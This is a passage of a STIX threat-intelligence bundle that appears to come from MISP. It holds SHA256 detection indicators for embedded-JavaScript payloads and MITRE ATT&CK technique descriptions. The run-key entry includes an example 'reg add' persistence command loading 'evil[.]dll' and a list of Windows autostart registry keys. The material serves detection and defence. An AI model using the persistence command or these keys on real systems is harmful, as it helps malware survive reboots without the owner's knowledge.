"identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = 'daed820a32723e146e762343d0a32f041d21bd2e603b355b2f91d0bc7d98927c']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--8f09eac1-5551-4cac-afa0-01a41231978c", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '41bb112c6d4c609d53111ad1bb7cc687ec8ab848b6039c7a8eb64fee311b0822']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--0da12927-e943-4516-adae-5cb9ebfe973d", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '1c1499485254acb0d94ec6b4ffcb0c33d1dc154b5d95cc433a44c8bbb66c718f']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--f4ca19a5-b5fe-45f0-9143-83d0523c85e1", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = 
'f87c6b520253d9d6b14a443ea2096baeb8cf532e9cc8843f39e6168cd873669d']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--e154a8ca-fcee-476b-99fd-199fb4e61a19", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '4f02b04252b268bffdc6584ced29254209fcac4ba7388527efa43786cad17aaa']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--79f280de-ff3f-4c56-9304-1c8a2bc6cbf4", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '33dc74a86e72a353412da885e5e07fe64b65f1769fe7ef17aa79b6bd6b36d0dc']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--4bcdb3e1-88f1-4d97-a0ff-23b6e1a99bab", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = 'f7cbe4349d4f95bbf08e1d649490fffe85e345976467bd1e0a066acfd3c2bb35']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": 
["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--7f49d4ab-f033-46bb-8668-fd7daea19462", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '88c6525924bf306dc21aada7898084622bf6a224465123025a53b1c187ff8ae9']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--8e63f46b-17ee-432f-8bc3-87be9ad97efc", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '3edc38bb3ad101f6e56d99e4c9f173c16346315ec7bb36e3d7f327dbcbdcd606']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--7e9d47dd-6767-41a1-8300-651eda509db4", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '502a08fa74475ad5affeaac4a0f9e491df59a20c97796ce88284e79821ac8483']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--9de2a8bf-23a0-456b-892f-0234cde7c773", "created_by_ref": 
"identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = 'e71d4f329b7353f95f5f13f3fd33c4727f9f06f96083e199c18ad3cf1a2351fa']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--939b4f00-05ad-4620-8d3a-c61effe72dcf", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '6af30df6ee33ee44e93e34aed5fbe80bef0e7d1832d96f60c61e3eace5df315e']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--f886350c-1d12-4c20-981c-f195ab5bcfb0", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '65d96b763572ad2a7a03ab964225414de9fc7f4b820a603ef3f94f9203fbe4b2']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--f2733d9c-de03-485e-8b2e-65e69d176dc6", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = 
'd3da04c58d81445754a4a837f3784e5fa7ec54ceeb8e595a836e9b87dc0c39cd']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--868385b2-a38d-4645-97ac-e64ca0da2c68", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '44bab852fa3bbaec1a03c900a8dace3c3553bf3c8289e5ffe9457633af0ea74a']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--a67ffa6e-0aee-4a2a-8741-46edcecd0da9", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = 'b02bc37b60170d53ff9d17ae0f75e6df5cde7287cede634bcb0042545585dd90']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--3921e712-ec5e-4454-baea-67035fb2efed", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '948ce1b8169805870338a59415ef470029323fc824a84bed9a760b2d78affb44']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": 
["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--5d0a2c88-9adb-4a0c-9547-40567fc76c77", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = 'adfdf33b7f14b4509d1d1ec5155bb57ae381b6a04ebc97281a58d3246d7abaa3']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--eca477c7-0d4e-4d45-958b-cf7be7d50d1e", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '1a11ba0de41e053025e98f64d4b6ac044f6afd0db00fb91f97c447a4e63a5e78']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--715bc095-4974-4715-b8cd-57d2db13a770", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '17c6aaa3efc51678cf4c269ba99e62859967c5d2a6da0303e66d60c1e04b20b6']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--05993e61-45ea-40ce-a35b-c08e71a15c57", "created_by_ref": 
"identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '638ef4333b1b2993e945dbbc57f8a2a2ee0ab84bf02ef11a6a343a07f673784a']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--e2e2604e-7060-4b45-9077-7c80e9a15fc3", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '40bd419635471cf6c8df65142cb1cadfc1ed88bb6f9f921abbdaf5041503bc96']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--d75eb593-345e-4a8b-8c64-5a53d4fda34d", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = 'bf30f0045791417fa1e691b4974d5651ffd4310a536f30df325fe89365f1fd70']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--2ce951e8-c41d-45dd-a553-e477f81aa2c3", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = 
'15929ca0bf26f189592cc6f2ba7fae8d10b0d84d86ecce2f74f583f7ebf849ed']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--4d033fe2-b1b7-417a-8955-c26dc1884ddb", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '832225013088d9619cca1bfc3192652fb434a2442ec33316342969c330b46825']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--98264004-0cd9-4add-9af5-d6647e55d32e", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '1cd45dac19c6d340f604546504393060d9b313d5b16a85f947e19daebc41dee5']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--f2fcfa1d-0b52-4afb-a7f5-2fd680815c66", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '1073bf25ac3af08cf3f48c2cbaed489ef43671387211d6e63f96aa7fcf1ec0b3']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": 
["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--0457bee4-2e48-4d33-9e76-8c8772a073a6", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = '543a1c4db82edce36ae07e4836b4d4a7640355bdf728d5ed41370892bf97d8a8']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "indicator", "id": "indicator--49fc12e2-76da-4892-95a9-dd6f73604892", "created_by_ref": "identity--5df15c12-89fc-45a7-9620-0044ac110004", "created": "2024-06-19T08:09:18.000Z", "modified": "2024-06-19T08:09:18.000Z", "description": "Embedded JS", "pattern": "[file:hashes.SHA256 = 'e39a3ceb034e425f4554df867871bb7c5df43ba116dea05b173c4bd444789aea']", "valid_from": "2024-06-19T08:09:18Z", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "Payload delivery"}], "labels": ["misp:type=\"sha256\"", "misp:category=\"Payload delivery\"", "misp:to_ids=\"True\""]}, {"type": "attack-pattern", "id": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", "created": "2024-06-21T12:14:16.000Z", "modified": "2024-06-21T12:14:16.000Z", "name": "Obfuscated Files or Information - T1406", "description": "ATT&CK Tactic | An app could contain malicious code in obfuscated or encrypted form, then deobfuscate or decrypt the code at runtime to evade many app vetting techniques.(Citation: Rastogi) (Citation: Zhou) (Citation: TrendMicro-Obad) (Citation: Xiao-iOS)", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "mitre-attack-pattern"}], "labels": ["misp:galaxy-name=\"Attack Pattern\"", "misp:galaxy-type=\"mitre-attack-pattern\"", 
"misp-galaxy:mitre-attack-pattern=\"Obfuscated Files or Information - T1406\""], "external_references": [{"source_name": "NIST Mobile Threat Catalogue", "external_id": "APP-21"}]}, {"type": "attack-pattern", "id": "attack-pattern--a93ccb8f-3996-42e2-b7c7-bb599d4e205f", "created": "2024-06-21T12:14:16.000Z", "modified": "2024-06-21T12:14:16.000Z", "name": "Masquerade as Legitimate Application - T1444", "description": "ATT&CK Tactic | An adversary could distribute developed malware by masquerading the malware as a legitimate application. This can be done in two different ways: by embedding the malware in a legitimate application, or by pretending to be a legitimate application.\n\nEmbedding the malware in a legitimate application is done by downloading the application, disassembling it, adding the malicious code, and then re-assembling it.(Citation: Zhou) The app would appear to be the original app, but would contain additional malicious functionality. The adversary could then publish the malicious application to app stores or use another delivery method.\n\nPretending to be a legitimate application relies heavily on lack of scrutinization by the user. 
Typically, a malicious app pretending to be a legitimate one will have many similar details as the legitimate one, such as name, icon, and description.(Citation: Palo Alto HenBox)\n\nMalicious applications may also masquerade as legitimate applications when requesting access to the accessibility service in order to appear as legitimate to the user, increasing the likelihood that the access will be granted.", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "mitre-attack-pattern"}], "labels": ["misp:galaxy-name=\"Attack Pattern\"", "misp:galaxy-type=\"mitre-attack-pattern\"", "misp-galaxy:mitre-attack-pattern=\"Masquerade as Legitimate Application - T1444\""], "external_references": [{"source_name": "NIST Mobile Threat Catalogue", "external_id": "APP-14"}]}, {"type": "attack-pattern", "id": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279", "created": "2024-06-21T12:14:16.000Z", "modified": "2024-06-21T12:14:16.000Z", "name": "Registry Run Keys / Startup Folder - T1547.001", "description": "ATT&CK Tactic | Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nPlacing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is <code>C:\\Users\\\\[Username]\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup</code>. 
The startup folder path for all users is <code>C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp</code>.\n\nThe following run keys are created by default on Windows systems:\n\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce</code>\n\nRun keys may exist under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node 2016) The <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx</code> is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.(Citation: Microsoft Run Key) For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: <code>reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\temp\\evil[.]dll\"</code> (Citation: Oddvar Moe RunOnceEx Mar 2018)\n\nThe following Registry keys can be used to set startup folder items for persistence:\n\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders</code>\n* <code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders</code>\n* <code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders</code>\n\nThe following Registry keys can control automatic startup of services during boot:\n\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce</code>\n* 
<code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce</code>\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices</code>\n\nUsing policy settings to specify startup programs creates corresponding values in either of two Registry keys:\n\n* <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run</code>\n* <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run</code>\n\nThe Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit</code> and <code>HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell</code> subkeys can automatically launch programs.\n\nPrograms listed in the load value of the registry key <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows</code> run when any user logs on.\n\nBy default, the multistring <code>BootExecute</code> value of the registry key <code>HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager</code> is set to <code>autocheck autochk *</code>. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.\n\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. 
Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "mitre-attack-pattern"}], "labels": ["misp:galaxy-name=\"Attack Pattern\"", "misp:galaxy-type=\"mitre-attack-pattern\"", "misp-galaxy:mitre-attack-pattern=\"Registry Run Keys / Startup Folder - T1547.001\""], "external_references": [{"source_name": "capec", "external_id": "CAPEC-270"}]}, {"type": "attack-pattern", "id": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735", "created": "2024-06-21T12:14:16.000Z", "modified": "2024-06-21T12:14:16.000Z", "name": "Remote System Discovery - T1018", "description": "ATT&CK Tactic | Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as [Ping](https://attack.mitre.org/software/S0097) or <code>net view</code> using [Net](https://attack.mitre.org/software/S0039).\n\nAdversaries may also analyze data from local host files (ex: <code>C:\\Windows\\System32\\Drivers\\etc\\hosts</code> or <code>/etc/hosts</code>) or other passive means (such as local [Arp](https://attack.mitre.org/software/S0099) cache entries) in order to discover the presence of remote systems in an environment.\n\nAdversaries may also target discovery of network infrastructure as well as leverage [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands on network devices to gather detailed information about systems within a network.(Citation: US-CERT-TA18-106A)(Citation: CISA AR21-126A FIVEHANDS May 2021) \n", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "mitre-attack-pattern"}], "labels": 
["misp:galaxy-name=\"Attack Pattern\"", "misp:galaxy-type=\"mitre-attack-pattern\"", "misp-galaxy:mitre-attack-pattern=\"Remote System Discovery - T1018\""], "external_references": [{"source_name": "capec", "external_id": "CAPEC-292"}]}, {"type": "attack-pattern", "id": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830", "created": "2024-06-21T12:14:16.000Z", "modified": "2024-06-21T12:14:16.000Z", "name": "Command and Scripting Interpreter - T1059", "description": "ATT&CK Tactic | Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nThere are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005).\n\nAdversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. 
Adversaries may also execute commands through interactive terminals/shells, as well as utilize various [Remote Services](https://attack.mitre.org/techniques/T1021) in order to achieve remote Execution.(Citation: Powershell Remote Commands)(Citation: Cisco IOS Software Integrity Assurance - Command History)(Citation: Remote Shell Execution in Python)", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "mitre-attack-pattern"}], "labels": ["misp:galaxy-name=\"Attack Pattern\"", "misp:galaxy-type=\"mitre-attack-pattern\"", "misp-galaxy:mitre-attack-pattern=\"Command and Scripting Interpreter - T1059\""], "external_references": [{"source_name": "mitre-attack", "external_id": "T1059"}]}, {"type": "attack-pattern", "id": "attack-pattern--241814ae-de3f-4656-b49e-f9a80764d4b7", "created": "2024-06-21T12:14:16.000Z", "modified": "2024-06-21T12:14:16.000Z", "name": "Security Software Discovery - T1063", "description": "ATT&CK Tactic | Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules and anti-virus. 
Adversaries may use the information from [Security Software Discovery](https://attack.mitre.org/techniques/T1063) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\n\n### Windows\n\nExample commands that can be used to obtain security software information are [netsh](https://attack.mitre.org/software/S0108), <code>reg query</code> with [Reg](https://attack.mitre.org/software/S0075), <code>dir</code> with [cmd](https://attack.mitre.org/software/S0106), and [Tasklist](https://attack.mitre.org/software/S0057), but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for.\n\n### Mac\n\nIt's becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.", "kill_chain_phases": [{"kill_chain_name": "misp-category", "phase_name": "mitre-attack-pattern"}], "labels": ["misp:galaxy-name=\"Attack Pattern\"", "misp:galaxy-type=\"mitre-attack-pattern\"", "misp-galaxy:mitre-attack-pattern=\"Security Software Discovery - T1063\""], "external_references": [{"source_name": "mitre-attack", "external_id": "T1063"}]}, {"type": "attack-pattern", "id": "attack-pattern--7fd87010-3a00-4da3-b905-410525e8ec44", "created": "2024-06-21T12:14:16.000Z", "modified": "2024-06-21T12:14:16.000Z", "name": "Scripting - 